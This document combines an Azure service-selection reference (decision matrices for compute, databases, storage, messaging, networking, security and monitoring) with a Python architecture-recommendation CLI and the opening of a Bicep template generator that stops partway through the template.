- **Use Functions** for event-driven glue (queue processing, webhooks, scheduled jobs).
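The decision matrix collapses into a first-cut chooser. A sketch in the style of the repo's architecture_designer.py (the predicates and function name are illustrative, not part of the tool):

```python
def pick_compute(*, event_driven=False, max_minutes=0, containerized=False,
                 need_full_k8s=False, gpu_or_custom_os=False) -> str:
    """First-cut compute choice following the decision matrix above."""
    if gpu_or_custom_os:
        return "Virtual Machines"
    if need_full_k8s:
        return "AKS"
    if event_driven:
        # Consumption caps executions at 10 minutes; Premium extends to 30.
        return ("Azure Functions (Consumption)" if max_minutes <= 10
                else "Azure Functions (Premium)")
    if containerized:
        return "Azure Container Apps"
    return "App Service"

print(pick_compute(event_driven=True, max_minutes=25))  # Azure Functions (Premium)
```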
### VM Size Selection

| Workload | Series | Example | vCPUs | RAM | Use Case |
|----------|--------|---------|-------|-----|----------|
| General purpose | Dv5/Dsv5 | Standard_D4s_v5 | 4 | 16 GB | Web servers, small databases |
| Memory optimized | Ev5/Esv5 | Standard_E8s_v5 | 8 | 64 GB | Databases, caching, analytics |
| Compute optimized | Fv2/Fsv2 | Standard_F8s_v2 | 8 | 16 GB | Batch processing, ML inference |
| Storage optimized | Lsv3 | Standard_L8s_v3 | 8 | 64 GB | Data warehouses, large databases |
| GPU | NCv3/NDv4 | Standard_NC6s_v3 | 6 | 112 GB | ML training, rendering |

**Always use v5 generation or newer** — better price-performance than older series.

---

## Database Services

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Relational, SQL Server compatible | Azure SQL Database |
| Relational, PostgreSQL | Azure Database for PostgreSQL Flexible Server |
| Relational, MySQL | Azure Database for MySQL Flexible Server |
| Document / multi-model, global distribution | Cosmos DB |
| Key-value cache, sessions | Azure Cache for Redis |
| Time-series, IoT data | Azure Data Explorer (Kusto) |
| Full-text search | Azure AI Search (formerly Cognitive Search) |
| Graph database | Cosmos DB (Gremlin API) |

### Cosmos DB vs Azure SQL vs PostgreSQL

| Feature | Cosmos DB | Azure SQL | PostgreSQL Flexible |
|---------|-----------|-----------|-------------------|
| Data model | Document, key-value, graph, table, column | Relational | Relational + JSON |
| Global distribution | Native multi-region writes | Geo-replication (async) | Read replicas |
| Consistency | 5 levels (strong to eventual) | Strong | Strong |
| Scaling | RU/s (auto or manual) | DTU or vCore | vCore |
| Serverless tier | Yes | Yes | No |
| Best for | Global apps, variable schema, low-latency reads | OLTP, complex queries, transactions | PostgreSQL ecosystem, extensions |
| Pricing model | Per RU/s + storage | Per DTU or per vCore | Per vCore |
| Managed backups | Continuous + point-in-time | Automatic + long-term retention | Automatic |

**Opinionated recommendation:**

- **Default to Azure SQL Serverless** for most relational workloads — auto-pause saves money in dev/staging.
- **Use PostgreSQL Flexible** when you need PostGIS, full-text search, or specific PostgreSQL extensions.
- **Use Cosmos DB** only when you need global distribution, sub-10ms latency, or flexible schema.
- **Never use Cosmos DB** for workloads that need complex joins or transactions across partitions.
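These recommendations also reduce to a short chooser. A sketch (flag names are illustrative; the rules restate the bullets above):

```python
def pick_database(*, relational=True, global_writes=False, needs_pg_extensions=False,
                  needs_cross_partition_tx=False) -> str:
    """First-cut database choice following the recommendations above."""
    # Cosmos DB is ruled out for cross-partition joins/transactions.
    if global_writes and not needs_cross_partition_tx:
        return "Cosmos DB"
    if relational and needs_pg_extensions:
        return "Azure Database for PostgreSQL Flexible Server"
    # Default for most relational workloads per the guidance above.
    return "Azure SQL Database (Serverless)"

print(pick_database(needs_pg_extensions=True))
# Azure Database for PostgreSQL Flexible Server
```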
### Azure SQL Tier Selection

| Tier | Use Case | Compute | Cost Range |
|------|----------|---------|------------|
| Basic / S0 | Dev/test, tiny workloads | 5 DTUs | $5/month |
| General Purpose (Serverless) | Variable workloads, dev/staging | 0.5-40 vCores (auto-pause) | $40-800/month |
| General Purpose (Provisioned) | Steady production workloads | 2-80 vCores | $150-3000/month |
| Business Critical | High IOPS, low latency, readable secondary | 2-128 vCores | $400-8000/month |
| Hyperscale | Large databases (>4 TB), instant scaling | 2-128 vCores | $200-5000/month |

---

## Storage Services

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Unstructured data (files, images, backups) | Blob Storage |
| File shares (SMB/NFS) | Azure Files |
| High-performance file shares | Azure NetApp Files |
| Data Lake (analytics, big data) | Data Lake Storage Gen2 |
| Disk storage for VMs | Managed Disks |
| Queue-based messaging (simple) | Queue Storage |
| Table data (simple key-value) | Table Storage (or Cosmos DB Table API) |

### Blob Storage Tiers

| Tier | Access Pattern | Cost (per GB/month) | Access Cost | Use Case |
|------|---------------|---------------------|-------------|----------|
| Hot | Frequent access | $0.018 | Low | Active data, web content |
| Cool | Infrequent (30+ days) | $0.01 | Medium | Backups, older data |
| Cold | Rarely accessed (90+ days) | $0.0036 | Higher | Compliance archives |
| Archive | Almost never (180+ days) | $0.00099 | High (rehydrate required) | Long-term retention |

**Always set lifecycle management policies.** Rule of thumb: Hot for 30 days, Cool for 90 days, Cold or Archive after that.
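That rule of thumb maps directly onto a lifecycle management policy. A sketch that emits the policy JSON (the helper name and defaults are illustrative; the shape follows the schema accepted by `az storage account management-policy create --policy @file.json`, so verify against current docs before use):

```python
import json

def lifecycle_policy(cool_after=30, archive_after=90, prefix=None) -> dict:
    """Build a blob lifecycle policy: Hot -> Cool -> Archive by age."""
    filters = {"blobTypes": ["blockBlob"]}
    if prefix:
        filters["prefixMatch"] = [prefix]
    return {"rules": [{
        "enabled": True,
        "name": "age-out",
        "type": "Lifecycle",
        "definition": {
            "actions": {"baseBlob": {
                "tierToCool": {"daysAfterModificationGreaterThan": cool_after},
                "tierToArchive": {"daysAfterModificationGreaterThan": archive_after},
            }},
            "filters": filters,
        },
    }]}

print(json.dumps(lifecycle_policy(prefix="backups/"), indent=2))
```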
---

## Messaging and Events

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Pub/sub, event routing, reactive | Event Grid |
| Reliable message queues, transactions | Service Bus |
| High-throughput event streaming | Event Hubs |
| Simple task queues | Queue Storage |
| IoT device telemetry | IoT Hub |

### Event Grid vs Service Bus vs Event Hubs

| Feature | Event Grid | Service Bus | Event Hubs |
|---------|-----------|-------------|------------|
| Pattern | Pub/Sub events | Message queue / topic | Event streaming |
| Delivery | At-least-once | At-least-once (peek-lock) | At-least-once (partitioned) |
| Ordering | No guarantee | FIFO (sessions) | Per partition |
| Max message size | 1 MB | 256 KB (Standard), 100 MB (Premium) | 1 MB (Standard), 20 MB (Premium) |
| Retention | 24 hours | 14 days (Standard) | 1-90 days |
| Throughput | Millions/sec | Thousands/sec | Millions/sec |
| Best for | Reactive events, webhooks | Business workflows, commands | Telemetry, logs, analytics |
| Dead letter | Yes | Yes | Via capture to storage |

**Opinionated recommendation:**

- **Event Grid** for reactive, fan-out scenarios (blob uploaded, resource created, custom events).
- **Service Bus** for reliable business messaging (orders, payments, workflows). Use topics for pub/sub, queues for point-to-point.
- **Event Hubs** for high-volume telemetry, log aggregation, and streaming analytics.
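The same three-way split as a chooser, for completeness (flag names are illustrative; the comments restate the recommendations above):

```python
def pick_messaging(*, streaming=False, ordered_workflow=False, reactive_fanout=False) -> str:
    """First-cut messaging choice following the recommendations above."""
    if streaming:
        return "Event Hubs"       # telemetry, logs, high-volume streams
    if ordered_workflow:
        return "Service Bus"      # reliable commands, FIFO via sessions
    if reactive_fanout:
        return "Event Grid"       # blob-created, resource events, webhooks
    return "Queue Storage"        # simple task queues

print(pick_messaging(ordered_workflow=True))  # Service Bus
```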
---

## Networking

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Global HTTP load balancing + CDN + WAF | Azure Front Door |
| Regional Layer 7 load balancing + WAF | Application Gateway |
| Regional Layer 4 load balancing | Azure Load Balancer |
| DNS management | Azure DNS |
| DNS-based global traffic routing | Traffic Manager |
| Private connectivity to PaaS | Private Endpoints |
| Site-to-site VPN | VPN Gateway |
| Dedicated private connection | ExpressRoute |
| Outbound internet from VNet | NAT Gateway |
| DDoS protection | Azure DDoS Protection |

### Front Door vs Application Gateway vs Load Balancer

| Feature | Front Door | Application Gateway | Load Balancer |
|---------|-----------|-------------------|--------------|
| Layer | 7 (HTTP/HTTPS) | 7 (HTTP/HTTPS) | 4 (TCP/UDP) |
| Scope | Global | Regional | Regional |
| WAF | Yes (Premium) | Yes (v2) | No |
| SSL termination | Yes | Yes | No |
| CDN | Built-in | No | No |
| Health probes | Yes | Yes | Yes |
| Best for | Global web apps, multi-region | Single-region web apps | TCP/UDP workloads, internal LB |
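The comparison reduces to two questions: is the traffic HTTP, and is the scope global? A sketch (flag names are illustrative):

```python
def pick_load_balancer(*, http=True, global_scope=False) -> str:
    """First-cut load balancer choice following the comparison above."""
    if not http:
        return "Azure Load Balancer"   # Layer 4, TCP/UDP
    if global_scope:
        return "Azure Front Door"      # global Layer 7 + CDN + WAF
    return "Application Gateway"       # regional Layer 7 + WAF

print(pick_load_balancer(http=False))  # Azure Load Balancer
```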
---

## Security and Identity

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| User authentication | Entra ID (Azure AD) |
| B2C customer identity | Entra External ID (Azure AD B2C) |
| Secrets, keys, certificates | Key Vault |
| Service-to-service auth | Managed Identity |
| Network access control | NSGs + Private Endpoints |
| Web application firewall | Front Door WAF or App Gateway WAF |
| Threat detection | Microsoft Defender for Cloud |
| Policy enforcement | Azure Policy |
| Privileged access management | Entra ID PIM |

### Managed Identity Usage

| Scenario | Configuration |
|----------|---------------|
| App Service accessing SQL | System-assigned MI + Azure SQL Entra auth |
| Functions accessing Key Vault | System-assigned MI + Key Vault RBAC |
| AKS pods accessing Cosmos DB | Workload Identity + Cosmos DB RBAC |
| VM accessing Storage | System-assigned MI + Storage RBAC |
| DevOps pipeline deploying | Workload Identity Federation (no secrets) |

**Rule: Every Azure service that supports Managed Identity should use it.** No connection strings with passwords, no service principal secrets in config.

---

## Monitoring and Observability

### Decision Matrix

| Requirement | Recommended Service |
|-------------|---------------------|
| Application performance monitoring | Application Insights |
| Log aggregation and queries | Log Analytics (KQL) |
| Metrics and alerts | Azure Monitor |
| Dashboards | Azure Dashboard or Grafana (managed) |
| Distributed tracing | Application Insights (OpenTelemetry) |
| Cost monitoring | Cost Management + Budgets |
| Security monitoring | Microsoft Defender for Cloud |
| Compliance monitoring | Azure Policy + Regulatory Compliance |

**Every resource should have diagnostic settings** sending logs and metrics to a Log Analytics workspace. Non-negotiable for production.
#!/usr/bin/env python3
"""
Azure architecture design and service recommendation tool.
Generates architecture patterns based on application requirements.

Usage:
    python architecture_designer.py --app-type web_app --users 10000
    python architecture_designer.py --app-type microservices --users 50000 --requirements '{"compliance": ["HIPAA"]}'
    python architecture_designer.py --app-type serverless --users 5000 --json
"""

import argparse
import json
import sys
from typing import Dict, List, Any


# ---------------------------------------------------------------------------
# Azure service catalog used by the designer
# ---------------------------------------------------------------------------

ARCHITECTURE_PATTERNS = {
    "web_app": {
        "small": "app_service_web",
        "medium": "app_service_scaled",
        "large": "multi_region_web",
    },
    "saas_platform": {
        "small": "app_service_web",
        "medium": "aks_microservices",
        "large": "multi_region_web",
    },
    "mobile_backend": {
        "small": "serverless_functions",
        "medium": "app_service_web",
        "large": "aks_microservices",
    },
    "microservices": {
        "small": "container_apps",
        "medium": "aks_microservices",
        "large": "aks_microservices",
    },
    "data_pipeline": {
        "small": "serverless_data",
        "medium": "synapse_pipeline",
        "large": "synapse_pipeline",
    },
    "serverless": {
        "small": "serverless_functions",
        "medium": "serverless_functions",
        "large": "serverless_functions",
    },
}


def _size_bucket(users: int) -> str:
    if users < 10000:
        return "small"
    if users < 100000:
        return "medium"
    return "large"

# ---------------------------------------------------------------------------
# Pattern builders
# ---------------------------------------------------------------------------

def _app_service_web(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 500)
    return {
        "recommended_pattern": "app_service_web",
        "description": "Azure App Service with managed SQL and CDN",
        "use_case": "Web apps, SaaS platforms, startup MVPs",
        "service_stack": [
            "App Service (Linux P1v3)",
            "Azure SQL Database (Serverless GP_S_Gen5_2)",
            "Azure Front Door",
            "Azure Blob Storage",
            "Key Vault",
            "Entra ID + RBAC",
            "Application Insights",
        ],
        "estimated_monthly_cost_usd": min(280, budget),
        "cost_breakdown": {
            "App Service P1v3": "$70-95",
            "Azure SQL Serverless": "$40-120",
            "Front Door": "$35-55",
            "Blob Storage": "$5-15",
            "Key Vault": "$1-5",
            "Application Insights": "$5-20",
        },
        "pros": [
            "Managed platform — no OS patching",
            "Built-in autoscale and deployment slots",
            "Easy CI/CD with GitHub Actions or Azure DevOps",
            "Custom domains and TLS certificates included",
            "Integrated authentication (Easy Auth)",
        ],
        "cons": [
            "Less control than VMs or containers",
            "Platform constraints for exotic runtimes",
            "Cold start on lower-tier plans",
            "Outbound IP shared unless isolated tier",
        ],
        "scaling": {
            "users_supported": "1k - 100k",
            "requests_per_second": "100 - 10,000",
            "method": "App Service autoscale rules (CPU, memory, HTTP queue)",
        },
    }

def _aks_microservices(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 2000)
    return {
        "recommended_pattern": "aks_microservices",
        "description": "Microservices on AKS with API Management and Cosmos DB",
        "use_case": "Complex SaaS, multi-team microservices, high-scale platforms",
        "service_stack": [
            "AKS (3 node pools: system, app, jobs)",
            "API Management (Standard v2)",
            "Cosmos DB (multi-model)",
            "Service Bus (Standard)",
            "Azure Container Registry",
            "Azure Monitor + Application Insights",
            "Key Vault",
            "Entra ID workload identity",
        ],
        "estimated_monthly_cost_usd": min(1200, budget),
        "cost_breakdown": {
            "AKS node pools (D4s_v5 x3)": "$350-500",
            "API Management Standard v2": "$175",
            "Cosmos DB": "$100-400",
            "Service Bus Standard": "$10-50",
            "Container Registry Basic": "$5",
            "Azure Monitor": "$50-100",
            "Key Vault": "$1-5",
        },
        "pros": [
            "Full Kubernetes ecosystem",
            "Independent scaling per service",
            "Multi-language and multi-framework",
            "Mature ecosystem (Helm, KEDA, Dapr)",
            "Workload identity — no credentials in pods",
        ],
        "cons": [
            "Kubernetes operational complexity",
            "Higher baseline cost",
            "Requires dedicated platform team",
            "Networking (CNI, ingress) configuration heavy",
        ],
        "scaling": {
            "users_supported": "10k - 10M",
            "requests_per_second": "1,000 - 1,000,000",
            "method": "Cluster autoscaler + KEDA event-driven autoscaling",
        },
    }

def _container_apps(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 500)
    return {
        "recommended_pattern": "container_apps",
        "description": "Serverless containers on Azure Container Apps",
        "use_case": "Microservices without Kubernetes management overhead",
        "service_stack": [
            "Azure Container Apps",
            "Azure Container Registry",
            "Cosmos DB",
            "Service Bus",
            "Key Vault",
            "Application Insights",
            "Entra ID managed identity",
        ],
        "estimated_monthly_cost_usd": min(350, budget),
        "cost_breakdown": {
            "Container Apps (consumption)": "$50-150",
            "Container Registry Basic": "$5",
            "Cosmos DB": "$50-150",
            "Service Bus Standard": "$10-30",
            "Key Vault": "$1-5",
            "Application Insights": "$5-20",
        },
        "pros": [
            "Serverless containers — scale to zero",
            "Built-in Dapr integration",
            "KEDA autoscaling included",
            "No cluster management",
            "Simpler networking than AKS",
        ],
        "cons": [
            "Less control than full AKS",
            "Limited to HTTP and event-driven workloads",
            "Smaller ecosystem than Kubernetes",
            "Some advanced features still in preview",
        ],
        "scaling": {
            "users_supported": "1k - 500k",
            "requests_per_second": "100 - 50,000",
            "method": "KEDA scalers (HTTP, queue length, CPU, custom)",
        },
    }

def _serverless_functions(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 300)
    return {
        "recommended_pattern": "serverless_functions",
        "description": "Azure Functions with Event Grid and Cosmos DB",
        "use_case": "Event-driven backends, APIs, scheduled jobs, webhooks",
        "service_stack": [
            "Azure Functions (Consumption plan)",
            "Event Grid",
            "Service Bus",
            "Cosmos DB (Serverless)",
            "Azure Blob Storage",
            "Application Insights",
            "Key Vault",
        ],
        "estimated_monthly_cost_usd": min(80, budget),
        "cost_breakdown": {
            "Functions (Consumption)": "$0-20 (1M free executions/month)",
            "Event Grid": "$0-5",
            "Service Bus Basic": "$0-10",
            "Cosmos DB Serverless": "$5-40",
            "Blob Storage": "$2-10",
            "Application Insights": "$5-15",
        },
        "pros": [
            "Pay-per-execution — true serverless",
            "Scale to zero, scale to millions",
            "Multiple trigger types (HTTP, queue, timer, blob, event)",
            "Durable Functions for orchestration",
            "Fast development cycle",
        ],
        "cons": [
            "Cold start latency (1-5s on consumption plan)",
            "10-minute execution timeout on consumption plan",
            "Limited local development experience",
            "Debugging distributed functions is complex",
        ],
        "scaling": {
            "users_supported": "1k - 1M",
            "requests_per_second": "100 - 100,000",
            "method": "Automatic (Azure Functions runtime scales instances)",
        },
    }

def _synapse_pipeline(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 1500)
    return {
        "recommended_pattern": "synapse_pipeline",
        "description": "Data pipeline with Event Hubs, Synapse, and Data Lake",
        "use_case": "Data warehousing, ETL, analytics, ML pipelines",
        "service_stack": [
            "Event Hubs (Standard)",
            "Data Factory / Synapse Pipelines",
            "Data Lake Storage Gen2",
            "Synapse Analytics (Serverless SQL pool)",
            "Azure Functions (processing)",
            "Power BI",
            "Azure Monitor",
        ],
        "estimated_monthly_cost_usd": min(800, budget),
        "cost_breakdown": {
            "Event Hubs Standard": "$20-80",
            "Data Factory": "$50-200",
            "Data Lake Storage Gen2": "$20-80",
            "Synapse Serverless SQL": "$50-300 (per TB scanned)",
            "Azure Functions": "$10-40",
            "Power BI Pro": "$10/user/month",
        },
        "pros": [
            "Unified analytics platform (Synapse)",
            "Serverless SQL — pay per query",
            "Native Spark integration",
            "Data Lake Gen2 — hierarchical namespace, cheap storage",
            "Built-in data integration (90+ connectors)",
        ],
        "cons": [
            "Synapse learning curve",
            "Cost unpredictable with serverless SQL at scale",
            "Complex permissions model (Synapse RBAC + storage ACLs)",
            "Spark pool startup time",
        ],
        "scaling": {
            "events_per_second": "1,000 - 10,000,000",
            "data_volume": "1 GB - 1 PB per day",
            "method": "Event Hubs throughput units + Synapse auto-scale",
        },
    }

def _serverless_data(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 300)
    return {
        "recommended_pattern": "serverless_data",
        "description": "Lightweight data pipeline with Functions and Data Lake",
        "use_case": "Small-scale ETL, event processing, log aggregation",
        "service_stack": [
            "Azure Functions",
            "Event Grid",
            "Data Lake Storage Gen2",
            "Azure SQL Serverless",
            "Application Insights",
        ],
        "estimated_monthly_cost_usd": min(120, budget),
        "cost_breakdown": {
            "Azure Functions": "$0-20",
            "Event Grid": "$0-5",
            "Data Lake Storage Gen2": "$5-20",
            "Azure SQL Serverless": "$20-60",
            "Application Insights": "$5-15",
        },
        "pros": [
            "Very low cost for small volumes",
            "Serverless end-to-end",
            "Simple to operate",
            "Scales automatically",
        ],
        "cons": [
            "Not suitable for high-volume analytics",
            "Limited transformation capabilities",
            "No built-in orchestration (use Durable Functions)",
        ],
        "scaling": {
            "events_per_second": "10 - 10,000",
            "data_volume": "1 MB - 100 GB per day",
            "method": "Azure Functions auto-scale",
        },
    }

def _multi_region_web(users: int, reqs: Dict) -> Dict[str, Any]:
    budget = reqs.get("budget_monthly_usd", 5000)
    return {
        "recommended_pattern": "multi_region_web",
        "description": "Multi-region active-active deployment with Front Door",
        "use_case": "Global applications, 99.99% uptime, data residency compliance",
        "service_stack": [
            "Azure Front Door (Premium)",
            "App Service (2+ regions) or AKS (2+ regions)",
            "Cosmos DB (multi-region writes)",
            "Azure SQL (geo-replication or failover groups)",
            "Traffic Manager (DNS failover)",
            "Azure Monitor + Log Analytics (centralized)",
            "Key Vault (per region)",
        ],
        "estimated_monthly_cost_usd": min(3000, budget),
        "cost_breakdown": {
            "Front Door Premium": "$100-200",
            "Compute (2 regions)": "$300-1000",
            "Cosmos DB (multi-region)": "$400-1500",
            "Azure SQL geo-replication": "$200-600",
            "Monitoring": "$50-150",
            "Data transfer (cross-region)": "$50-200",
        },
        "pros": [
            "Global low latency",
            "99.99% availability",
            "Automatic failover",
            "Data residency compliance",
            "Front Door WAF at the edge",
        ],
        "cons": [
            "1.5-2x cost vs single region",
            "Data consistency challenges (Cosmos DB conflict resolution)",
            "Complex deployment pipeline",
            "Cross-region data transfer costs",
        ],
        "scaling": {
            "users_supported": "100k - 100M",
            "requests_per_second": "10,000 - 10,000,000",
            "method": "Per-region autoscale + Front Door global routing",
        },
    }

PATTERN_DISPATCH = {
    "app_service_web": _app_service_web,
    "app_service_scaled": _app_service_web,  # same builder, cost adjusts
    "aks_microservices": _aks_microservices,
    "container_apps": _container_apps,
    "serverless_functions": _serverless_functions,
    "synapse_pipeline": _synapse_pipeline,
    "serverless_data": _serverless_data,
    "multi_region_web": _multi_region_web,
}


# ---------------------------------------------------------------------------
# Core recommendation logic
# ---------------------------------------------------------------------------

def recommend(app_type: str, users: int, requirements: Dict) -> Dict[str, Any]:
    """Return architecture recommendation for the given inputs."""
    bucket = _size_bucket(users)
    patterns = ARCHITECTURE_PATTERNS.get(app_type, ARCHITECTURE_PATTERNS["web_app"])
    pattern_key = patterns.get(bucket, "app_service_web")
    builder = PATTERN_DISPATCH.get(pattern_key, _app_service_web)
    result = builder(users, requirements)

    # Add compliance notes if relevant
    compliance = requirements.get("compliance", [])
    if compliance:
        result["compliance_notes"] = []
        if "HIPAA" in compliance:
            result["compliance_notes"].append(
                "Enable Microsoft Defender for Cloud, BAA agreement, audit logging, encryption at rest with CMK"
            )
        if "SOC2" in compliance:
            result["compliance_notes"].append(
                "Azure Policy SOC 2 initiative, Defender for Cloud regulatory compliance dashboard"
            )
        if "GDPR" in compliance:
            result["compliance_notes"].append(
                "Data residency in EU region, Purview for data classification, consent management"
            )
        if "ISO27001" in compliance or "ISO 27001" in compliance:
            result["compliance_notes"].append(
                "Azure Policy ISO 27001 initiative, audit logs to Log Analytics, access reviews in Entra ID"
            )

    return result

def generate_checklist(result: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return an implementation checklist for the recommended architecture."""
    services = result.get("service_stack", [])
    return [
        {
            "phase": "Planning",
            "tasks": [
                "Review architecture pattern and Azure services",
                "Estimate costs with Azure Pricing Calculator",
                "Define environment strategy (dev, staging, production)",
                "Set up Azure subscription and resource groups",
                "Define tagging strategy (environment, owner, cost-center, app-name)",
            ],
        },
        {
            "phase": "Foundation",
            "tasks": [
                "Create VNet with subnets (app, data, management)",
                "Configure NSGs and Private Endpoints",
                "Set up Entra ID groups and RBAC assignments",
                "Create Key Vault and seed with initial secrets",
                "Enable Microsoft Defender for Cloud",
            ],
        },
        {
            "phase": "Core Services",
            "tasks": [f"Deploy {svc}" for svc in services],
        },
        {
            "phase": "Security",
            "tasks": [
                "Enable Managed Identity on all services",
                "Configure Private Endpoints for PaaS resources",
                "Set up Application Gateway or Front Door with WAF",
                "Assign Azure Policy initiatives (CIS, SOC 2, etc.)",
                "Enable diagnostic settings on all resources",
            ],
        },
        {
            "phase": "Monitoring",
            "tasks": [
                "Create Log Analytics workspace",
                "Enable Application Insights for all services",
                "Create Azure Monitor alert rules for critical metrics",
                "Set up Action Groups for notifications (email, Teams, PagerDuty)",
                "Create Azure Dashboard for operational visibility",
            ],
        },
        {
            "phase": "CI/CD",
            "tasks": [
                "Set up Azure DevOps or GitHub Actions pipeline",
                "Configure workload identity federation (no secrets in CI)",
                "Implement Bicep deployment pipeline with what-if preview",
                "Set up staging slots or blue-green deployment",
                "Document rollback procedures",
            ],
        },
    ]
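
The checklist is a plain list of `{"phase": ..., "tasks": [...]}` dicts, so it renders easily in formats beyond the CLI's `[ ] task` output. A minimal sketch (the `checklist_to_markdown` helper is illustrative, not part of the script) that turns it into markdown task lists:

```python
def checklist_to_markdown(checklist):
    """Render a [{phase, tasks}] checklist as markdown task-list sections."""
    lines = []
    for phase in checklist:
        lines.append(f"## {phase['phase']}")
        lines.extend(f"- [ ] {task}" for task in phase["tasks"])
        lines.append("")  # blank line between phases
    return "\n".join(lines)

demo = [{"phase": "Planning", "tasks": ["Estimate costs", "Define tagging strategy"]}]
print(checklist_to_markdown(demo))
```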


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------


def _format_text(result: Dict[str, Any]) -> str:
    lines = []
    lines.append(f"Pattern: {result['recommended_pattern']}")
    lines.append(f"Description: {result['description']}")
    lines.append(f"Use Case: {result['use_case']}")
    lines.append(f"Estimated Monthly Cost: ${result['estimated_monthly_cost_usd']}")
    lines.append("")
    lines.append("Service Stack:")
    for svc in result.get("service_stack", []):
        lines.append(f"  - {svc}")
    lines.append("")
    lines.append("Cost Breakdown:")
    for k, v in result.get("cost_breakdown", {}).items():
        lines.append(f"  {k}: {v}")
    lines.append("")
    lines.append("Pros:")
    for p in result.get("pros", []):
        lines.append(f"  + {p}")
    lines.append("")
    lines.append("Cons:")
    for c in result.get("cons", []):
        lines.append(f"  - {c}")
    if result.get("compliance_notes"):
        lines.append("")
        lines.append("Compliance Notes:")
        for note in result["compliance_notes"]:
            lines.append(f"  * {note}")
    lines.append("")
    lines.append("Scaling:")
    for k, v in result.get("scaling", {}).items():
        lines.append(f"  {k}: {v}")
    return "\n".join(lines)


def main():
    parser = argparse.ArgumentParser(
        description="Azure Architecture Designer — recommend Azure architecture patterns based on application requirements.",
        epilog="Examples:\n"
        "  python architecture_designer.py --app-type web_app --users 10000\n"
        "  python architecture_designer.py --app-type microservices --users 50000 --json\n"
        '  python architecture_designer.py --app-type serverless --users 5000 --requirements \'{"compliance":["HIPAA"]}\'',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--app-type",
        required=True,
        choices=["web_app", "saas_platform", "mobile_backend", "microservices", "data_pipeline", "serverless"],
        help="Application type to design for",
    )
    parser.add_argument(
        "--users",
        type=int,
        default=1000,
        help="Expected number of users (default: 1000)",
    )
    parser.add_argument(
        "--requirements",
        type=str,
        default="{}",
        help="JSON string of additional requirements (budget_monthly_usd, compliance, etc.)",
    )
    parser.add_argument(
        "--checklist",
        action="store_true",
        help="Include implementation checklist in output",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output as JSON instead of human-readable text",
    )

    args = parser.parse_args()

    try:
        reqs = json.loads(args.requirements)
    except json.JSONDecodeError as exc:
        print(f"Error: invalid --requirements JSON: {exc}", file=sys.stderr)
        sys.exit(1)

    result = recommend(args.app_type, args.users, reqs)

    if args.checklist:
        result["implementation_checklist"] = generate_checklist(result)

    if args.json_output:
        print(json.dumps(result, indent=2))
    else:
        print(_format_text(result))
        if args.checklist:
            print("\n--- Implementation Checklist ---")
            for phase in result["implementation_checklist"]:
                print(f"\n{phase['phase']}:")
                for task in phase["tasks"]:
                    print(f"  [ ] {task}")


if __name__ == "__main__":
    main()
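
The `--requirements` flag carries a JSON object whose `compliance` list drives the compliance notes in the recommendation. The parse-and-dispatch pattern in isolation (a standalone sketch; the note strings here are abbreviated stand-ins for the full recommendations):

```python
import json

# Simulates the value a user would pass via --requirements.
raw = '{"budget_monthly_usd": 500, "compliance": ["HIPAA", "GDPR"]}'
reqs = json.loads(raw)

notes = []
compliance = reqs.get("compliance", [])
if "HIPAA" in compliance:
    notes.append("Defender for Cloud, BAA, CMK encryption")
if "GDPR" in compliance:
    notes.append("EU data residency, Purview classification")

print(notes)
```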

@@ -0,0 +1,775 @@
#!/usr/bin/env python3
"""
Azure Bicep template generator.
Generates Bicep infrastructure-as-code scaffolds for common Azure architecture patterns.

Usage:
    python bicep_generator.py --arch-type web-app
    python bicep_generator.py --arch-type microservices --output main.bicep
    python bicep_generator.py --arch-type serverless --json
    python bicep_generator.py --help
"""

import argparse
import json
import sys
from typing import Dict


# ---------------------------------------------------------------------------
# Bicep templates
# ---------------------------------------------------------------------------


def _web_app_template() -> str:
    return r"""// =============================================================================
// Azure Web App Architecture — Bicep Template
// App Service + Azure SQL + Front Door + Key Vault + Application Insights
// =============================================================================

@description('Environment name')
@allowed(['dev', 'staging', 'production'])
param environment string = 'dev'

@description('Azure region')
param location string = resourceGroup().location

@description('Application name (lowercase, no spaces)')
@minLength(3)
@maxLength(20)
param appName string

@description('SQL admin Entra ID object ID')
param sqlAdminObjectId string

// ---------------------------------------------------------------------------
// Key Vault
// ---------------------------------------------------------------------------

resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
  name: '${environment}-${appName}-kv'
  location: location
  properties: {
    sku: { family: 'A', name: 'standard' }
    tenantId: subscription().tenantId
    enableRbacAuthorization: true
    enableSoftDelete: true
    softDeleteRetentionInDays: 30
    networkAcls: {
      defaultAction: 'Deny'
      bypass: 'AzureServices'
    }
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
// App Service Plan + App Service
// ---------------------------------------------------------------------------

resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-plan'
  location: location
  sku: {
    name: environment == 'production' ? 'P1v3' : 'B1'
    tier: environment == 'production' ? 'PremiumV3' : 'Basic'
    capacity: 1
  }
  properties: {
    reserved: true // Linux
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

resource appService 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-web'
  location: location
  properties: {
    serverFarmId: appServicePlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20-lts'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      alwaysOn: environment == 'production'
      healthCheckPath: '/health'
    }
  }
  identity: {
    type: 'SystemAssigned'
  }
  tags: {
    environment: environment
    'app-name': appName
  }
}

// ---------------------------------------------------------------------------
